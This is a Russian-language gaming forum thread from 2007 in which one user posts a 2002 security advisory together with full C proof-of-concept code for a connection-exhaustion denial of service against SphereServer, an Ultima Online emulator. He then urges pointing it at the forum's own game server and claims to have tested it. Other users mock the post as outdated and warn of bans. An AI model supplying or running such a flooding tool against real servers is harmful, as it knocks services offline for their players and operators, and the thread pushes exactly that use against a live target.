Ответить с цитированием
Бред ты пишеш , запарил с какойто сферой , тут понтонуться хочеш.... Лесом иди
|
| |||||
 |
Oskom ForumsДобро пожаловать на Oskom Forums.
|
+ Ответить в теме
Показано с 1 по 20 из 29
Тема: Еще рас и подробно
-
Novice
[Banned]
- Регистрация
- 16.05.2007
- Сообщений
- 89
28.05.2007 17:31 #1
Еще рас и подробно
Описание: Нет таймаута на соединение до проверки имени пользователя и ограничения числа коннектов с одного IP.Код:H Zero Seven Security Advisory [15.02.2002] ------------------------------------------- SphereServer Denial of Service Vulnerability -------------------------------------------- Summary: The SphereServer is an Ultima Online Roleplay Server (Multiplayer). Some people use this inofficial Server to host Free Roleplay Worlds for an large community of Players. The Developer of the Software is MenaSoft (www.menasoft.com). Thus no ip-limitation exists in the configuration so anyone can connect several times. The Problem is that an client can hold the connection without user-identification. So its possible to reach the maximum connection count and block other users. Affected Systems: Sphere99x - Linux, FreeBSD, Win32 Possible affected: Sphere 0.5x Informations: The SphereServer user-auth is very simple and you can authenticate with telnet too. linentw:~ # telnet target 2593 Trying target... Connected to target. Escape character is '^]'. [so at this point the sphereserver count you as an client]: 90:Client connected [Total:1] from '10.0.0.112'. [now send an space and the sphereserver ask for the username] Username: _ [type username return and the password] cc:Login 'validusername' <-- loged in and with the client you can play :) So the problem is that the server count you as an client still you connect and sent nothing to it. And do this several times until the max_connections reached, so the server blocks all new connections. linentw:~ # telnet target 2593 Trying target... Connected to target. Escape character is '^]'. Maximum connections reached, please try it later Connection closed by foreign host. There is no true time_out variable in the configuration file and the death_socket function does not work correctly in sphere. The Vendor has been informed about this, but no answer. www.sphereserver.com www.menasoft.com Fix: no true fix available, but set the death_socket variable in the configuration to 3 should help for the first time, even it does not work correctly (its like an dice-game). Disclaimer: This advisory does not claim to be complete. The informations may be inaccurate or wrong. Possible exploit code is only written for testing purposes. Articles based on informations in this advisory should have an link to this document. Exploit: /* * * www.h07.org * H Zero Seven * Unix Security Research Team * * Sphere Ultima Online Server - Denial of Service Vulnerability * poc-exploit... * * Simple code to eat all connections from the gameserver, so other * peoples could not connect to the server. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdarg.h> #include <time.h> #include <sys/time.h> int Connect(int ip, int port) { int fd; struct sockaddr_in tgt; fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (fd<0) return -1; memset(&tgt,0,sizeof(struct sockaddr_in)); tgt.sin_port = htons(port); tgt.sin_family = AF_INET; tgt.sin_addr.s_addr = ip; if (connect(fd,(struct sockaddr*)&tgt,sizeof(struct sockaddr))<0) return -1; return fd; } int sprint(int fd, const char *str,...) { va_list args; char buf[4096]; memset(&buf,0,sizeof(buf)); va_start(args,str); vsnprintf(buf,sizeof(buf),str,args); return(write(fd,buf,strlen(buf))); } int main(int argc, char *argv[]) { int fd; struct sockaddr_in box; fprintf(stderr, "SphereServer DoS Exploit [poc]\n"); fprintf(stderr, "H Zero Seven - Unix Security Research Team - www.h07.org\n\n"); if (argc < 2) { fprintf(stderr, "usage: %s <sphere ip> [sphere port]\n",argv[0]); return; } fprintf(stderr,"for the full advisory regarding this vulnerability visit www.h07.org ... \n"); fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (fd<0) { perror("socket() "); return; } fprintf(stderr,"Attacking sphere : "); for (;;) { int sock; sock = Connect(inet_addr(argv[1]), (argc>2)?(atoi(argv[2])):3128); if (sock<0) { sleep(10); continue; } fprintf(stderr, ".*"); } } Reference: H Zero Seven - Unix/Linux Developer Team http://www.h07.org
Опасность: 9/10
-
Идущий в рай дорогой ада
- Регистрация
- 13.09.2005
- Сообщений
- 5,169
28.05.2007 17:32 #2
-
You can't kill the Messiah!
- Регистрация
- 05.12.2004
- Сообщений
- 4,107
28.05.2007 17:32 #3
Да не парься, Одиколон всё равно исходники сферы зажал
-
Grandmaster
[Banned]
- Регистрация
- 12.06.2005
- Адрес
- [+]-=Рама=-[+] напиши в приписке СоТ и будь лахом! :D ____________
- Сообщений
- 5,041
28.05.2007 17:33 #4
обычно с боку , коменты пишут.. я просто не врубаюсь где там ето.. какая строка.?:
-
Novice
[Banned]
- Регистрация
- 16.05.2007
- Сообщений
- 89
28.05.2007 17:33 #5
теперь объясню, запускаем, ставим таргеты на оском сервер, выполняем, смотрим как быстро заполоняеться онлайн, сфера если выжержит - то онлайн мах, некого больше не пустит, если не выжержит - будет откат
-
ex-Developer
- Регистрация
- 16.06.2001
- Адрес
- Пятикратно [Banned] Оскома.
- Сообщений
- 11,076
28.05.2007 17:34 #6
На первую строчку посмотри, дятел :) Год там видишь? Это такие 4 циферки последние в квадратных скобочках %) написано 2002, а щас 2007... Если отнять от 2007 2002 - будет 5. Этому эксплоиту 5 (ПЯТЬ!!!) лет %) Никого ты им уже не напугаешь :)
-
Идущий в рай дорогой ада
- Регистрация
- 13.09.2005
- Сообщений
- 5,169
28.05.2007 17:34 #7
МОжеш объяснить вообще к чему это он выкладывает?
Сообщение от Haldir
Да не парься, Одиколон всё равно исходники сферы зажал
-
You can't kill the Messiah!
- Регистрация
- 05.12.2004
- Сообщений
- 4,107
28.05.2007 17:35 #8
Это всё туфта, я вот на Опее пол-года назад баг нашёл, которым можно было сферу откатывать
-
Grandmaster
[Banned]
- Регистрация
- 01.06.2005
- Адрес
- ¤SoT¤
- Сообщений
- 4,782
28.05.2007 17:35 #9
Потсану все малину поломал Сообщение от Eidolon
-
ex-Developer
- Регистрация
- 16.06.2001
- Адрес
- Пятикратно [Banned] Оскома.
- Сообщений
- 11,076
28.05.2007 17:36 #10
Да её и щас ничё не мешает откатывать %) Тока не таким древним извратом %) Сообщение от Haldir
-
Идущий в рай дорогой ада
- Регистрация
- 13.09.2005
- Сообщений
- 5,169
28.05.2007 17:36 #11
Ух ты , вот как вы осады брали? Сообщение от Haldir
-
Novice
[Banned]
- Регистрация
- 16.05.2007
- Сообщений
- 89
28.05.2007 17:36 #12
ЛОХ?! скажеш на оскоме залатали дыру ? тестил сейчас еше и на 0,99 все прекрасно пашет, так что не пизди тут ока ? Сообщение от Eidolon
На первую строчку посмотри, дятел Год там видишь? Это такие 4 циферки последние в квадратных скобочках %) написано 2002, а щас 2007... Если отнять от 2007 2002 - будет 5. Этому эксплоиту 5 (ПЯТЬ!!!) лет %) Никого ты им уже не напугаешь
-
You can't kill the Messiah!
- Регистрация
- 05.12.2004
- Сообщений
- 4,107
28.05.2007 17:37 #13
Ну он наверно у себя дома запустил TUS, откомпилил прогу и пришёл в экстаз от полученного результата Сообщение от BepkuT
МОжеш объяснить вообще к чему это он выкладывает?
Короче, там просто создаются "фиктивные" соединения.
-
whiteGuest
28.05.2007 17:37 #14
Вот с этих строк я реально выпааал Сообщение от Eidolon
Это такие 4 циферки последние в квадратных скобочках %) написано 2002, а щас 2007... Если отнять от 2007 2002 - будет 5. Этому эксплоиту 5 (ПЯТЬ!!!) лет %) Никого ты им уже не напугаешь
-
Grandmaster
[Banned]
- Регистрация
- 12.06.2005
- Адрес
- [+]-=Рама=-[+] напиши в приписке СоТ и будь лахом! :D ____________
- Сообщений
- 5,041
28.05.2007 17:37 #15
все я терь больше не боюсь, а поначалу уххх как испугалсо.. ухх Сообщение от Eidolon
Никого ты им уже не напугаешь
-
You can't kill the Messiah!
- Регистрация
- 05.12.2004
- Сообщений
- 4,107
28.05.2007 17:37 #16
Не я сразу сдал баг. Сейчас кстати очень жалею Сообщение от BepkuT
Ух ты , вот как вы осады брали?
-
Идущий в рай дорогой ада
- Регистрация
- 13.09.2005
- Сообщений
- 5,169
28.05.2007 17:39 #17
А я сразу не боялся , так всё равно не понял , что это и для чего он кидал Сообщение от R a m
А куда он это впихнуть хотел то?
-
ex-Developer
- Регистрация
- 16.06.2001
- Адрес
- Пятикратно [Banned] Оскома.
- Сообщений
- 11,076
28.05.2007 17:39 #18
Нашёл где тестить %) На 99 %)
Да не, флаг те в руки, кул хацкер %) Пробуй %) Тока не удевляйся потом, что тебя на половину крупных российских серверов пускать разом перестанет ;)
-
Идущий в рай дорогой ада
- Регистрация
- 13.09.2005
- Сообщений
- 5,169
28.05.2007 17:40 #19
А дали хоть там ленточку за баг ? Сообщение от Haldir
[ Или же отделался спасибо
-
Novice
[Banned]
- Регистрация
- 16.05.2007
- Сообщений
- 89
28.05.2007 17:42 #20
мне от етого не холодно не жарко. Сообщение от Eidolon
Нашёл где тестить %) На 99 %)
Да не, флаг те в руки, кул хацкер %) Пробуй %) Тока не удевляйся потом, что тебя на половину крупных российских серверов пускать разом перестанет
Ваши права
- Вы не можете создавать новые темы
- Вы не можете отвечать в темах
- Вы не можете прикреплять вложения
- Вы не можете редактировать свои сообщения